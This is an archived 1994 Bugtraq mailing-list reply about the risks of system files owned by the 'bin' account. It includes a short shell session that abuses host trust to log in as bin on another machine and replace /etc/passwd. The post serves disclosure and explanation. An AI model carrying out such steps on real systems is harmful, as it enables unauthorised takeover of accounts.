Bugtraq mailing list archives

Re: bin ownership problem

From: george () siltrain demon co uk (George Hodson)
Date: Thu, 19 May 94 13:36:37 BST

Ok, I'll expose my ignorance and ask, what is the specific vulnerability
of bin owned files?  I understand how it is a problem on NFS exported
files to insecure hosts, but what is the risk for files/dirs on a locally
non-exported file system?  What about groups, is bin a bad group also?


The main problem I've ever had with bin owning system files and other
user id's owning things as well (daemon, gmaes, etc) is that it's just that
much more to watch for. With root owning all the important stuff
it centers your attention on that userid and prevention with just one
userid.


Also, another (similar) problem is when a host is trusted (recall
/etc/hosts.equiv comes with a default "+" on some systems).

trusted# su - bin
trusted# rlogin gotcha
gotcha$ who am i
gotcha!bin     ttyp3   May 17 08:54
gotcha$ ls -lgd /etc
drwxr-sr-x  9 bin      staff        2048 May 19 07:08 /etc
gotcha$ cd /etc;mv passwd passwd.bak
gotcha$ vi passwd    #read in passswd.old, make changes etc...

bad news!

George

Current thread:

Re: bin ownership problem George Hodson (May 19)
- <Possible follow-ups>
- Re: bin ownership problem Brad Powell - Sun CIS (May 19)
  - Re: bin ownership problem Perry E. Metzger (May 19)
  - source routing kernel hack Brad Powell - Sun CIS (May 19)
  - Re: bin ownership problem Karl Strickland (May 19)
  - bosperf bug THOMAS P. WALPOLE (May 19)
    - Re: bosperf bug Rick Weldon, Sys. Adm 55060 (May 20)
    - Re: bosperf bug Aggelos D. Keromitis (May 20)